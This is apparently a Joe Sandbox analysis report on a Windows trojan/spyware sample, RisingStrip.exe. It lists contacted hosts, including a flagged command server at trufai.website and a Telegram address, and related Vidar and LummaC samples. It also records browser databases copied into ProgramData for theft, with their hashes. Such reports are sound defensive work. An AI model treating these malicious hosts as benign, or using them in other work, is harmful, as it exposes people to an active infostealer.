https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 00000011.00000003.2141000642.0000119C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2098177046.0000119C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7604	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/hj	chrome.exe, 00000011.00000003.2098630985.0000119C00684000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/7761	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ogs.google.com/widget/app/so?eom=1	chrome.exe, 00000011.00000003.2139142043.000001E0012D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2135840351.000001E00141C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/7760	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	f379r9.12.dr	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	im7gdj.12.dr	false	high
http://anglebug.com/5901	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/3965	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/6439	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/7406	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/search	chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7161	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/xt	chrome.exe, 00000011.00000003.2141774477.000001E0015B8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive-autopush.corp.google.com/	chrome.exe, 00000011.00000003.2108117965.000001E0004A4000.00000004.00000800.00020000.00000000.sdmp	false	high
https://google-ohttp-relay-join.fastly-edge.com/Wt	chrome.exe, 00000011.00000003.2141774477.000001E0015B8000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/search?q=$	chrome.exe, 00000011.00000003.2121193500.000001E001158000.00000004.00000800.00020000.00000000.sdmp	false	high
https://anglebug.com/7162	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aia.entrust.net/ts1-chain256.cer01	RisingStrip.exe	false	high
http://anglebug.com/5906	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anglebug.com/2517	chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.18.4	www.google.com	United States	15169	GOOGLEUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.185.142	play.google.com	United States	15169	GOOGLEUS	false
142.250.186.110	plus.l.google.com	United States	15169	GOOGLEUS	false
116.203.13.109	trufai.website	Germany	24940	HETZNER-ASDE	true

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583753
Start date and time:	2025-01-03 14:29:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RisingStrip.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@47/47@9/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 36 Number of non-executed functions: 36
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 142.250.185.67, 142.250.186.46, 74.125.71.84, 142.250.181.238, 172.217.16.206, 216.58.206.35, 142.250.184.234, 142.250.185.202, 142.250.185.234, 142.250.186.170, 172.217.18.106, 142.250.186.138, 216.58.206.42, 142.250.184.202, 172.217.16.138, 172.217.18.10, 142.250.186.42, 142.250.185.170, 142.250.186.106, 142.250.181.234, 142.250.185.74, 172.217.16.202, 172.217.23.110, 52.149.20.212, 184.28.90.27, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, clients.l.google.com, www.gstatic.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:29:53	API Interceptor	1x Sleep call for process: RisingStrip.exe modified
08:29:58	API Interceptor	1x Sleep call for process: Red.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	http://www.klim.com	Get hash	malicious	Unknown	Browse
	https://telegra.ph/Clarkson-122025-01-02	Get hash	malicious	Unknown	Browse
	https://goatstuff.sbs/re5.mp4	Get hash	malicious	Unknown	Browse
	http://t1.awagama2.org	Get hash	malicious	Unknown	Browse
	https://d25mwe2145ri5.cloudfront.net/installer/33365003/2056290341532614624	Get hash	malicious	Unknown	Browse
	http://www.escudier-sas.fr	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	http://www.technoafriwave.rw	Get hash	malicious	Unknown	Browse
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	https://specificallycries.com	Get hash	malicious	Unknown	Browse
	http://4.nscqn.dashboradcortx.xyz/4hbVgI3060FFjU163rczgakrldw288HJUBSXEIQRWLNTA425583MYLP8076x12	Get hash	malicious	Unknown	Browse
116.203.13.109	CenteredDealing.exe	Get hash	malicious	Vidar	Browse
116.203.13.109	CenteredDealing.exe	Get hash	malicious	Vidar	Browse
149.154.167.99	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	https://telegra.ph/Clarkson-122025-01-02	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://telegra.ph/Clarkson-122025-01-02	Get hash	malicious	Unknown	Browse	149.154.167.99
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	over.ps1	Get hash	malicious	Vidar	Browse	149.154.167.99
	MatAugust.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	149.154.167.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	https://telegra.ph/Clarkson-122025-01-02	Get hash	malicious	Unknown	Browse	149.154.167.220
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FACT0987789000900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://telegra.ph/Clarkson-122025-01-02	Get hash	malicious	Unknown	Browse	149.154.167.99
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	mcgen.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
HETZNER-ASDE	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	135.181.65.216
	2Mi3lKoJfj.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
	3.elf	Get hash	malicious	Unknown	Browse	195.201.78.91
	2.elf	Get hash	malicious	Unknown	Browse	212.127.42.203
	https://klickskydd.skolverket.org/?url=https%3A%2F%2Fwww.gazeta.ru%2Fpolitics%2Fnews%2F2024%2F12%2F22%2F24684722.shtml&id=71de&rcpt=upplysningstjansten@skolverket.se&tss=1735469857&msgid=b53e7603-c5d3-11ef-8a2e-0050569b0508&html=1&h=ded85c63	Get hash	malicious	HTMLPhisher	Browse	138.201.139.144
	https://www.gazeta.ru/politics/news/2024/12/22/24684722.shtml	Get hash	malicious	HTMLPhisher	Browse	138.201.139.144
	https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtml	Get hash	malicious	HTMLPhisher	Browse	138.201.139.144
	http://www.rr8844.com	Get hash	malicious	Unknown	Browse	88.99.67.51
	DF2.exe	Get hash	malicious	Unknown	Browse	78.46.239.124
	YJaaZuNHwI.exe	Get hash	malicious	Quasar	Browse	195.201.57.90

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	adguardVPNInstaller.exe	Get hash	malicious	Unknown	Browse	116.203.13.109 149.154.167.99
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	116.203.13.109 149.154.167.99
	Setup.msi	Get hash	malicious	Unknown	Browse	116.203.13.109 149.154.167.99
	Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe	Get hash	malicious	Remcos	Browse	116.203.13.109 149.154.167.99
	file.exe	Get hash	malicious	XRed	Browse	116.203.13.109 149.154.167.99
	file.exe	Get hash	malicious	XRed	Browse	116.203.13.109 149.154.167.99
	file.exe	Get hash	malicious	XRed	Browse	116.203.13.109 149.154.167.99
	file.exe	Get hash	malicious	XRed	Browse	116.203.13.109 149.154.167.99
	file.exe	Get hash	malicious	XRed	Browse	116.203.13.109 149.154.167.99
	file.exe	Get hash	malicious	XRed	Browse	116.203.13.109 149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse
	over.ps1	Get hash	malicious	Vidar	Browse
	MatAugust.exe	Get hash	malicious	Vidar	Browse
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse
	vlid_acid.exe	Get hash	malicious	LummaC Stealer	Browse
	AquaPac.exe	Get hash	malicious	LummaC Stealer	Browse
	0442.pdf.exe	Get hash	malicious	Remcos	Browse
	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\ProgramData\y5xtj\1nym7g

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\y5xtj\7q16x4790

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\y5xtj\8ym7yus0z

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\y5xtj\ba1dj5

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08436842005578409
Encrypted:	false
SSDEEP:	192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
MD5:	2CD2840E30F477F23438B7C9D031FC08
SHA1:	03D5410A814B298B068D62ACDF493B2A49370518
SHA-256:	49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
SHA-512:	DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\y5xtj\f379r9

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\y5xtj\im7gdj

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\y5xtj\phlnoh

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\y5xtj\qq16fu

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\y5xtj\rq9hd2

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Active_Setup.exe, Detection: malicious, Browse Filename: CenteredDealing.exe, Detection: malicious, Browse Filename: CenteredDealing.exe, Detection: malicious, Browse Filename: over.ps1, Detection: malicious, Browse Filename: MatAugust.exe, Detection: malicious, Browse Filename: 6684V5n83w.exe, Detection: malicious, Browse Filename: vlid_acid.exe, Detection: malicious, Browse Filename: AquaPac.exe, Detection: malicious, Browse Filename: 0442.pdf.exe, Detection: malicious, Browse Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\q

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	538004
Entropy (8bit):	7.999669969070157
Encrypted:	true
SSDEEP:	12288:umAK6Ih+3HRND9sV6kJ2POmWlVh05zBWgL2eWeEIv1Kvc9S8:uTVISnc2/y05zJyeV+k9z
MD5:	0FA1961F4D1CA0B03C3ED6A3F009583C
SHA1:	985A75402C71BA01111BB0620B13B0F66725D41B
SHA-256:	127CEFC5B81045B30C5F092179E7E97EB75CCDFC9387448C2A4CF92512D3E3B4
SHA-512:	F66BBDFF11B46C88C6689B9CDE97972CFA04B720D42177EBF027ADB4E83DE820ECF8E6E044FD4A6A27AAB8148BA6F695CF92B7EE16D94DC7F738644AFB27DE7E
Malicious:	false
